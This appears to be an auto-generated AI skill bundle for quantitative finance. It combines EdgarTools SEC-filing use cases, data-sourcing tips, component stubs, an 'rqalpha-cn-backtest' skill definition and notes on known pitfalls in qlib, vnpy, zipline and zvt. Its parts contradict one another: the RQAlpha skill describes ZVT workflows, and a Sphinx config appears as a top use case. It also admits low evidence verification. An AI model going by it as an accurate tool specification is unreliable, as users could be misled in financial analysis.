**Source**: `notebooks/financial-statements-to-dataframe.ipynb`

Exporting financial statements to pandas DataFrames for further analysis, visualization, or integration with other data tools.

## `KUC-123`
**Source**: `notebooks/extract-revenue-earnings-python.ipynb`

Extracting specific financial metrics like revenue, net income, and free cash flow for time series analysis and growth tracking.

## `KUC-124`
**Source**: `notebooks/XBRL2-FactQueries.ipynb`

Querying XBRL facts using semantic search to find specific financial data points, concepts, and dimensional breakdowns.

## `KUC-125`
**Source**: `notebooks/sec-filing-exhibits-python.ipynb`

Accessing and extracting exhibits attached to SEC filings including press releases, supporting documents, and supplemental information.

## `KUC-126`
**Source**: `docs/examples/fund_examples.py`

Navigating fund entities including fund companies, series, and share classes to find and analyze fund information by ticker, CIK, or Series ID.

## `KUC-127`
**Source**: `examples/scripts/ai/ai_context.py`

Generating token-efficient context from SEC filings for consumption by large language models (LLMs) with support for progressive disclosure.

## `KUC-128`
**Source**: `examples/scripts/advanced/ranking_search_examples.py`

Performing relevance-ranked search within SEC filings using BM25 or hybrid algorithms for semantic content discovery.

## `KUC-129`
**Source**: `examples/scripts/advanced/enterprise_config.py`

Configuring EdgarTools for enterprise use cases including custom SEC mirrors, rate limiting, and environment-based configuration profiles.

## `KUC-130`
**Source**: `notebooks/proxy-statement-def14a-python.ipynb`

Analyzing proxy statements (DEF 14A) for governance information including executive compensation, shareholder proposals, and board composition.

## `KUC-131`
**Source**: `docs/examples/formtype_demo_examples.py`

Using FormType enum for IDE autocomplete and type-safe form specification when querying SEC filings.

## `KUC-132`
**Source**: `docs/examples/periodtype_demo_examples.py`

Using PeriodType enum for period specification including annual, quarterly, TTM, and YTD with enhanced validation.

## `KUC-133`
**Source**: `docs/examples/feat004_demo_enhanced_validation.py`

Demonstrating enhanced parameter validation with helpful error messages for invalid form types, periods, and other inputs.

## `KUC-134`
**Source**: `docs/examples/plot_revenue.py`

Creating financial visualizations showing revenue, gross profit, and net income trends over time with professional formatting.

## `KUC-135`
**Source**: `examples/scripts/advanced/section_detection_demo.py`

Automatically detecting and identifying sections within SEC filings using hybrid detection with confidence scoring.

## `KUC-136`
**Source**: `notebooks/revenue-segment-hierarchy-python.ipynb`

Analyzing revenue segmentation and product/service hierarchies within financial statements to understand business composition.

## `KUC-137`
**Source**: `notebooks/fund-census-ncen-python.ipynb`

Analyzing fund census data from N-CEN filings including fund series, service providers, and classification information.

## `KUC-138`
**Source**: `notebooks/sec-comment-letters-python.ipynb`

Accessing and analyzing SEC staff comment letters to understand regulatory review topics and compliance issues.

## `KUC-139`
**Source**: `examples/scripts/basic/entity_facts_dataframe.py`

Exporting company financial facts to pandas DataFrames for custom analysis with filtering by period type and concept.

## `KUC-140`
**Source**: `examples/table_width_example.py`

Controlling table column widths when extracting text from SEC filings for AI/LLM processing to prevent truncation.

## `KUC-141`
**Source**: `notebooks/Beginners-Guide.ipynb`

Getting started with EdgarTools to perform basic SEC filing operations including company lookup, filing retrieval, and financial data access.

## `KUC-142`
**Source**: `notebooks/XBRL2-PeriodViews.ipynb`

Rendering XBRL statements with different period views including quarterly comparisons, annual comparisons, and YTD breakdowns.

## `KUC-143`
**Source**: `docs/examples/feat005_demo_statement_types.py`

Using StatementType enum for organized categorization of financial statements including primary, comprehensive, analytical, and specialized statements.

## `KUC-144`
**Source**: `docs/examples/investment_fund_research.py`

Researching investment fund performance and comparing with competitors using fund entity data and filings.

## `KUC-145`
**Source**: `notebooks/XBRL2-StandardizedStatements.ipynb`

Accessing standardized financial statements (income, balance, cash flow) from XBRL data with consistent formatting.

## `KUC-146`
**Source**: `docs/examples/offering_lifecycle_ai_discovery.py`

Demonstrating AI agent workflow for discovering crowdfunding campaign lifecycle data using context hints without manual API knowledge.

## `KUC-147`
**Source**: `notebooks/XBRL2-NonFinancialStatements.ipynb`

Accessing non-standard XBRL statements such as segment information, revenue by market, and other supplemental disclosures.

## `KUC-148`
**Source**: `notebooks/sec-reference-data-python.ipynb`

Accessing SEC reference data including company tickers, exchange listings, and company metadata for identification and lookup.

## `KUC-149`
**Source**: `tests/demo_to_markdown.ipynb`

Converting SEC filing content to markdown format with proper table formatting for documentation and sharing.

## `KUC-150`
**Source**: `notebooks/Initial-Insider-Transactions.ipynb`

Tracking initial insider filings (Form 3) and subsequent transactions (Form 4) for executive and director ownership reporting.

## `KUC-151`
**Source**: `notebooks/Paging-Through-Filings.ipynb`

Navigating through large sets of SEC filings using pagination methods to access results across multiple pages.

## `KUC-152`
**Source**: `notebooks/XBRL2-CustomTags.ipynb`

Analyzing custom XBRL tags and taxonomy extensions used by companies beyond standard US-GAAP tags.

## `KUC-153`
**Source**: `examples/scripts/ai/skills_usage.py`

Using AI Skills system for specialized SEC analysis workflows with helper functions and documentation.

## `KUC-154`
**Source**: `examples/scripts/ai/basic_docs.py`

Accessing interactive documentation directly within Python for learning the EdgarTools API without external resources.

## `KUC-155`
**Source**: `examples/scripts/advanced/start_page_number_example.py`

Controlling starting page numbers when converting documents to markdown with page break markers.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **8**

## `CW-DATA-SOURCING-001` — Exponential backoff retry with rate limit detection
**From**: finance-bp-079--akshare, finance-bp-114--edgar-crawler · **Applicable to**: data-sourcing

Implement retry logic with exponential backoff specifically for HTTP 429 rate limit responses. Retrying immediately on rate limit errors worsens the block situation. Separate retry logic for transient network errors (TimeoutError, ConnectionError) from permanent errors (ValueError, KeyError) prevents resource waste and masks underlying bugs.

## `CW-DATA-SOURCING-002` — Strict date format validation and standardization
**From**: finance-bp-070--edgartools, finance-bp-079--akshare, finance-bp-084--eastmoney · **Applicable to**: data-sourcing

Validate date formats strictly (YYYY-MM-DD pattern with leap year and month-end checks) before processing XBRL or API data. Convert date strings between formats (YYYYMMDD to YYYY-MM-DD) when storing to databases. Invalid dates corrupt downstream financial calculations.

## `CW-DATA-SOURCING-003` — XBRL fact attribute completeness enforcement
**From**: finance-bp-070--edgartools, finance-bp-114--edgar-crawler · **Applicable to**: data-sourcing

Extract and validate all essential XBRL fact attributes (concept, value, period, unit) from every fact. Missing attributes cause financial analysis queries to return incomplete or misleading results. Period type (instant vs duration) must be correctly distinguished for accurate balance sheet rendering.

## `CW-DATA-SOURCING-004` — Streaming parser threshold for large documents
**From**: finance-bp-070--edgartools, finance-bp-128--yfinance · **Applicable to**: data-sourcing

Implement streaming parser activation when documents exceed configurable thresholds (10MB default). This prevents OOM errors on large NPORT-P filings or bulk document downloads. Also require timezone information for time-series data to prevent DST offset corruption.

## `CW-DATA-SOURCING-005` — Data accuracy disclaimer requirements
**From**: finance-bp-079--akshare, finance-bp-128--yfinance, finance-bp-097--OpenBB · **Applicable to**: data-sourcing

Always present scraped or third-party financial data with proper caveats about accuracy limitations and delays. Claims of guaranteed accuracy, real-time capabilities, or Yahoo/provider affiliation violate terms of service and can lead to user financial losses from reliance on delayed or incorrect data.

## `CW-DATA-SOURCING-006` — Atomic write ordering for versioned storage
**From**: finance-bp-103--ArcticDB · **Applicable to**: data-sourcing

Write atom keys (TABLE_DATA, TABLE_INDEX, VERSION) before updating mutable reference keys (VERSION_REF, SNAPSHOT_REF). Never modify atom keys after writing to preserve content-addressed storage invariants. This prevents readers from accessing incomplete data in multi-writer scenarios.

## `CW-DATA-SOURCING-007` — HTTP status code validation before data processing
**From**: finance-bp-079--akshare, finance-bp-097--OpenBB · **Applicable to**: data-sourcing

Always validate HTTP response status codes before processing response data. Error responses (404, 500) may contain HTML error pages that corrupt downstream JSON parsing. Explicitly check for HTTP 429 and raise RateLimitError for proper handling by callers.

## `CW-DATA-SOURCING-008` — Quality gates for financial recommendations
**From**: finance-bp-084--eastmoney · **Applicable to**: data-sourcing

Apply fundamental quality filters (ROE thresholds, OCF/Profit ratios, debt ratios) before generating financial recommendations. Without quality gates, low-quality stocks may be recommended for positions, leading to investment losses. Separate on-demand computation from scheduled pre-computation to handle API rate limits.

FILE:references/components/ai_integration_layer.md
# ai_integration_layer (6 classes)

## `HasContext.to_context`
`ai_integration_layer/hascontext-to-context.py:0`

## `compose_context`
`ai_integration_layer/compose-context.py:0`

## `TokenOptimizer.optimize`
`ai_integration_layer/tokenoptimizer-optimize.py:0`

## `get_tool_definitions`
`ai_integration_layer/get-tool-definitions.py:0`

## `AI Context Detail`
`ai_integration_layer/ai-context-detail.py:0`

## `Integration Path`
`ai_integration_layer/integration-path.py:0`

FILE:references/components/asset-backed_securities_data.md
# asset-backed_securities_data (3 classes)

## `TenD.get_distribution_report`
`asset-backed_securities_data/tend-get-distribution-report.py:0`

## `CMBSAssetData.to_dataframe`
`asset-backed_securities_data/cmbsassetdata-to-dataframe.py:0`

## `ABS Type`
`asset-backed_securities_data/abs-type.py:0`

FILE:references/components/entity_resolution_and_company_data.md
# entity_resolution_and_company_data (4 classes)

## `Company.get_financials`
`entity_resolution_and_company_data/company-get-financials.py:0`

## `get_entity`
`entity_resolution_and_company_data/get-entity.py:0`

## `Company.filings`
`entity_resolution_and_company_data/company-filings.py:0`

## `Identifier Type`
`entity_resolution_and_company_data/identifier-type.py:0`

FILE:references/components/filing_search_and_discovery.md
# filing_search_and_discovery (3 classes)

## `FastSearch.search`
`filing_search_and_discovery/fastsearch-search.py:0`

## `BDCSearchIndex.find`
`filing_search_and_discovery/bdcsearchindex-find.py:0`

## `Search Type`
`filing_search_and_discovery/search-type.py:0`

FILE:references/components/financial_statement_rendering.md
# financial_statement_rendering (5 classes)

## `Statement.__rich__`
`financial_statement_rendering/statement-rich.py:0`

## `RenderedStatement.to_markdown`
`financial_statement_rendering/renderedstatement-to-markdown.py:0`

## `Statement.to_dataframe`
`financial_statement_rendering/statement-to-dataframe.py:0`

## `Output Format`
`financial_statement_rendering/output-format.py:0`

## `Comparison Display`
`financial_statement_rendering/comparison-display.py:0`

FILE:references/components/html_document_parsing.md
# html_document_parsing (5 classes)

## `Document.parse`
`html_document_parsing/document-parse.py:0`

## `Document.get_section`
`html_document_parsing/document-get-section.py:0`

## `HTMLParser.parse`
`html_document_parsing/htmlparser-parse.py:0`

## `Section Detection Strategy`
`html_document_parsing/section-detection-strategy.py:0`

## `Table Processing`
`html_document_parsing/table-processing.py:0`

FILE:references/components/multi-period_statement_stitching.md
# multi-period_statement_stitching (4 classes)

## `StatementStitcher.stitch`
`multi-period_statement_stitching/statementstitcher-stitch.py:0`

## `StitchedStatement.to_dataframe`
`multi-period_statement_stitching/stitchedstatement-to-dataframe.py:0`

## `XBRLS.get_income_statement`
`multi-period_statement_stitching/xbrls-get-income-statement.py:0`

## `Period Selection Strategy`
`multi-period_statement_stitching/period-selection-strategy.py:0`

FILE:references/components/ownership_and_insider_transaction_reporting.md
# ownership_and_insider_transaction_reporting (4 classes)

## `Form4.transactions`
`ownership_and_insider_transaction_reporting/form4-transactions.py:0`

## `Ownership.get_summary`
`ownership_and_insider_transaction_reporting/ownership-get-summary.py:0`

## `TransactionSummary.to_dataframe`
`ownership_and_insider_transaction_reporting/transactionsummary-to-dataframe.py:0`

## `Form Type`
`ownership_and_insider_transaction_reporting/form-type.py:0`

FILE:references/components/sec_edgar_data_retrieval.md
# sec_edgar_data_retrieval (5 classes)

## `Filings.get_filings`
`sec_edgar_data_retrieval/filings-get-filings.py:0`

## `Filing.document`
`sec_edgar_data_retrieval/filing-document.py:0`

## `Filing.xbrl`
`sec_edgar_data_retrieval/filing-xbrl.py:0`

## `HTTP Client Backend`
`sec_edgar_data_retrieval/http-client-backend.py:0`

## `Filing Index Format`
`sec_edgar_data_retrieval/filing-index-format.py:0`

FILE:references/components/xbrl_financial_data_processing.md
# xbrl_financial_data_processing (6 classes)

## `XBRL.parse`
`xbrl_financial_data_processing/xbrl-parse.py:0`

## `FactsView.get_facts`
`xbrl_financial_data_processing/factsview-get-facts.py:0`

## `FactQuery.by_concept`
`xbrl_financial_data_processing/factquery-by-concept.py:0`

## `ConceptMapper.standardize`
`xbrl_financial_data_processing/conceptmapper-standardize.py:0`

## `Concept Standardization`
`xbrl_financial_data_processing/concept-standardization.py:0`

## `Period Selection`
`xbrl_financial_data_processing/period-selection.py:0`

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Rqalpha Cn Backtest

Skill

基于20日价格动量在沪深300、沪深500与国债之间自动轮转配置，通过RQAlpha框架执行完整回测并评估组合绩效。

---
name: rqalpha-cn-backtest
description: |-
  基于20日价格动量在沪深300、沪深500与国债之间自动轮转配置，通过RQAlpha框架执行完整回测并评估组合绩效。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-089"
  compiled_at: "2026-04-22T13:00:37.233732+00:00"
  capability_markets: "cn-astock"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# RQAlpha A 股回测 (rqalpha-cn-backtest)

> 基于20日价格动量在沪深300、沪深500与国债之间自动轮转配置，通过RQAlpha框架执行完整回测并评估组合绩效。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (2 total)

### Index Futures Momentum Rotation Strategy (`UC-101`)
Implements a momentum-based rotation strategy between equity indices (CSI 300, CSI 500) and government bonds, automatically rebalancing to the best-pe
**Triggers**: momentum rotation, index futures, equity bond allocation

### Sphinx Documentation Configuration (`UC-102`)
Configuration file for building rqalpha project documentation using Sphinx, setting up autodoc, autosummary, and other documentation extensions
**Triggers**: documentation, sphinx, configuration

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-089. Evidence verify ratio = 44.4% and audit fail total = 12. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-089` blueprint at 2026-04-22T13:00:37.233732+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Sphinx Documentation Configuration', 'Index Futures Momentum Rotation Strategy', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder', 'Institutional fund holdings tracker via joinquant_fund_runner pattern']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

